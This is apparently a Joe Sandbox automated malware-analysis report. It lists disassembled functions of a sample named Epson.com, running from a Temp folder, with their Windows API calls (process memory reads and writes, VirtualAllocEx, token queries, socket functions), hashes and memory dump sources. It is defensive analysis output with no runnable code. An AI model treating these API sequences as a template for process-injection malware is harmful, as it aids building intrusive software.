                                                                                                                                                                                                                                      • Opcode ID: 08025827e4e3b086f8bbb58e1c21d8b75971a57ac39361b705ee69bcdde401e9
                                                                                                                                                                                                                                      • Instruction ID: 3600046289dab42359acba7f2be9eed0ed31902d0dfbfcd828de64727aabc4aa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08025827e4e3b086f8bbb58e1c21d8b75971a57ac39361b705ee69bcdde401e9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF0181B5601209BFDB114F65DC88DAA3F6DFF85364B210424F845CB260DA35DC41AA60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FB1976
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FB1982
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FB1991
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FB1998
                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FB19AE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 44706859-0
                                                                                                                                                                                                                                      • Opcode ID: 61428789dd2fb081663ba838de874fe548b304d0d27d90f21b7a40b39bfd7c4d
                                                                                                                                                                                                                                      • Instruction ID: 62e6f6eb2617df1f74158891a0084721a494cc6a029eac783638cbe07ba0ce26
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61428789dd2fb081663ba838de874fe548b304d0d27d90f21b7a40b39bfd7c4d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59F06279500349AFD7214F65EC99F973B6DFF897A0F100414FA45CB651CA70D8009A60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FB1916
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FB1922
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FB1931
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FB1938
                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FB194E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 44706859-0
                                                                                                                                                                                                                                      • Opcode ID: 450b4a6faefbf39d67469afb1bd4fac32e446d72ea9478ccc7ba8762036f45c3
                                                                                                                                                                                                                                      • Instruction ID: e994943e67e7f05d36a9b451fa54e5b1042f4de804b56bec79c2899a15be0747
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 450b4a6faefbf39d67469afb1bd4fac32e446d72ea9478ccc7ba8762036f45c3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3BF06D7560034AAFDB210FA5DC9DF963BADFF897A0F500414FA45DB6A1CA70DC00AA60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00FC0B24,?,00FC3D41,?,00000001,00F93AF4,?), ref: 00FC0CCB
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00FC0B24,?,00FC3D41,?,00000001,00F93AF4,?), ref: 00FC0CD8
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00FC0B24,?,00FC3D41,?,00000001,00F93AF4,?), ref: 00FC0CE5
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00FC0B24,?,00FC3D41,?,00000001,00F93AF4,?), ref: 00FC0CF2
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00FC0B24,?,00FC3D41,?,00000001,00F93AF4,?), ref: 00FC0CFF
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00FC0B24,?,00FC3D41,?,00000001,00F93AF4,?), ref: 00FC0D0C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                                                                                      • Opcode ID: ba68294435514b1485bdf7cf3b6e634d4a32f57e6ae02873785ff695a0cb3b80
                                                                                                                                                                                                                                      • Instruction ID: 47bfd588cbdcec20668a91a415f997d51b3058ecbbb54794211ebbc535016c02
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba68294435514b1485bdf7cf3b6e634d4a32f57e6ae02873785ff695a0cb3b80
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C01A271800B16DFCB30AFA6DA81916F7F5BF503253158A3ED19752931CBB0A955EF80
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00FB65BF
                                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00FB65D6
                                                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 00FB65EE
                                                                                                                                                                                                                                      • KillTimer.USER32(?,0000040A), ref: 00FB660A
                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00FB6624
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3741023627-0
                                                                                                                                                                                                                                      • Opcode ID: a41c104c3f44106fee6a080efc19e493d58094c2a403993ce220ed2af1473962
                                                                                                                                                                                                                                      • Instruction ID: d2a9b4b0b28fc9f2a14488cd715b164b102358fc93825a0fcc0784c7b5d0f464
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a41c104c3f44106fee6a080efc19e493d58094c2a403993ce220ed2af1473962
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E018630900308ABEB305F21DD8EBD67B78FB00705F040569A586E54E1DBF4AA54AE50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F8DAD2
                                                                                                                                                                                                                                        • Part of subcall function 00F82D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00F8DB51,01021DC4,00000000,01021DC4,00000000,?,00F8DB78,01021DC4,00000007,01021DC4,?,00F8DF75,01021DC4), ref: 00F82D4E
                                                                                                                                                                                                                                        • Part of subcall function 00F82D38: GetLastError.KERNEL32(01021DC4,?,00F8DB51,01021DC4,00000000,01021DC4,00000000,?,00F8DB78,01021DC4,00000007,01021DC4,?,00F8DF75,01021DC4,01021DC4), ref: 00F82D60
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F8DAE4
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F8DAF6
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F8DB08
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F8DB1A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                      • Opcode ID: 7f6bda998fcb5aa9df0ff3afa9b7ba150ccc32839f71e8d5be13a55e7a0a36e3
                                                                                                                                                                                                                                      • Instruction ID: a129d405d7a1091005a3c2e4cfcba4137e691da87cb8ded4c435b026ab310d95
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f6bda998fcb5aa9df0ff3afa9b7ba150ccc32839f71e8d5be13a55e7a0a36e3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6F06233904214AB8664FB98E8C9C9AB7EEEE443203A54C05F448D7541CB3DFC809750
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F8262E
                                                                                                                                                                                                                                        • Part of subcall function 00F82D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00F8DB51,01021DC4,00000000,01021DC4,00000000,?,00F8DB78,01021DC4,00000007,01021DC4,?,00F8DF75,01021DC4), ref: 00F82D4E
                                                                                                                                                                                                                                        • Part of subcall function 00F82D38: GetLastError.KERNEL32(01021DC4,?,00F8DB51,01021DC4,00000000,01021DC4,00000000,?,00F8DB78,01021DC4,00000007,01021DC4,?,00F8DF75,01021DC4,01021DC4), ref: 00F82D60
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F82640
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F82653
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F82664
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F82675
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                      • Opcode ID: c58505d45230fe5ef0f8c3367eda463c9ecb3afc4e43a0613d55a77eb77ae218
                                                                                                                                                                                                                                      • Instruction ID: 0c6aca1d884c48e6d23ae7259a72c19c8cb40e55cc5962b89187d3a4267fd4df
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c58505d45230fe5ef0f8c3367eda463c9ecb3afc4e43a0613d55a77eb77ae218
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69F0FE718011209B86B2BF94FC89C887B64FB39761325490AF8A4D626DD73F2902BFC4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __freea$_free
                                                                                                                                                                                                                                      • String ID: a/p$am/pm
                                                                                                                                                                                                                                      • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                      • Opcode ID: 2f147ae965ed863bec4aeccc14144da54c189aabf45dfa2a96d3f892b72f2a8a
                                                                                                                                                                                                                                      • Instruction ID: 5e7966923c92abceb51435e0d217b3498c4a94ef971f2791839fb77cb0f7b232
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f147ae965ed863bec4aeccc14144da54c189aabf45dfa2a96d3f892b72f2a8a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BCD10571D00206DADB24BF68C855BFEB7B9FF05720F28435AE5429B250E3359D82EB91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00FBBDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FB2B1D,?,?,00000034,00000800,?,00000034), ref: 00FBBDF4
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00FB30AD
                                                                                                                                                                                                                                        • Part of subcall function 00FBBD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FB2B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00FBBDBF
                                                                                                                                                                                                                                        • Part of subcall function 00FBBCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00FBBD1C
                                                                                                                                                                                                                                        • Part of subcall function 00FBBCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00FB2AE1,00000034,?,?,00001004,00000000,00000000), ref: 00FBBD2C
                                                                                                                                                                                                                                        • Part of subcall function 00FBBCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00FB2AE1,00000034,?,?,00001004,00000000,00000000), ref: 00FBBD42
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FB311A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FB3167
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                      • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                      • Opcode ID: ff0c98ef40072703b5a2b04e3a03923d082f9489b605fa27392dbd7e489bf053
                                                                                                                                                                                                                                      • Instruction ID: c1c1f95d992f23cac5cd68d4c5e762d6200af71ce9321499cc66a5a77c67027c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff0c98ef40072703b5a2b04e3a03923d082f9489b605fa27392dbd7e489bf053
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3413A72D00218BEDB10DBA9CC85ADEBBB8EF49300F004095FA55BB180DA746F89DF60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\250478\Epson.com,00000104), ref: 00F81AD9
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F81BA4
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F81BAE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$FileModuleName
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\250478\Epson.com
                                                                                                                                                                                                                                      • API String ID: 2506810119-4009054095
                                                                                                                                                                                                                                      • Opcode ID: c8574cd10c7c254c8de115b61f4095514d18d95c176972b89568679987971284
                                                                                                                                                                                                                                      • Instruction ID: 33de664c91d31b8cbac9eabf9f83ac49e2766fcbb9649c3d72a4b0b23b92ef2d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8574cd10c7c254c8de115b61f4095514d18d95c176972b89568679987971284
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96317371E00218BFCB21EF99DC85DDEBBFCFB85710B2042A6E80497211E6755E45EB90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00FBCBB1
                                                                                                                                                                                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00FBCBF7
                                                                                                                                                                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,010229C0,01206558), ref: 00FBCC40
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                      • Opcode ID: 35256239ef1c3fe8210a2259c1b56fea08ae5bf5f1a17f9ce08555f887c8cece
                                                                                                                                                                                                                                      • Instruction ID: 09ef61735f27f0aabb50be643f8ac685d21ef7c7866f808626d746ad2d51d4de
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 35256239ef1c3fe8210a2259c1b56fea08ae5bf5f1a17f9ce08555f887c8cece
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE41D1716043429FD720DF25CC84B9BBBE4AB84720F14462DF5A59B291CB34E904DF92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00FEDCD0,00000000,?,?,?,?), ref: 00FE4F48
                                                                                                                                                                                                                                      • GetWindowLongW.USER32 ref: 00FE4F65
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FE4F75
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Long
                                                                                                                                                                                                                                      • String ID: SysTreeView32
                                                                                                                                                                                                                                      • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                      • Opcode ID: 6eda1e9f3ef9ba4323df6394eb0c355444df148d7d243e8836282b0e207c12f0
                                                                                                                                                                                                                                      • Instruction ID: f198ba59e5f2b528289c0b326f4bbb2a03a729a39f65bbaa7c897d4e85a25e60
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6eda1e9f3ef9ba4323df6394eb0c355444df148d7d243e8836282b0e207c12f0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D31BE31600285AFDB208F79DC45BEA77A9EB48334F204719F979A31E0C774EC50AB50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00FD3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00FD3AD4,?,?), ref: 00FD3DD5
                                                                                                                                                                                                                                      • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00FD3AD7
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FD3AF8
                                                                                                                                                                                                                                      • htons.WSOCK32(00000000,?,?,00000000), ref: 00FD3B63
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                                                                      • String ID: 255.255.255.255
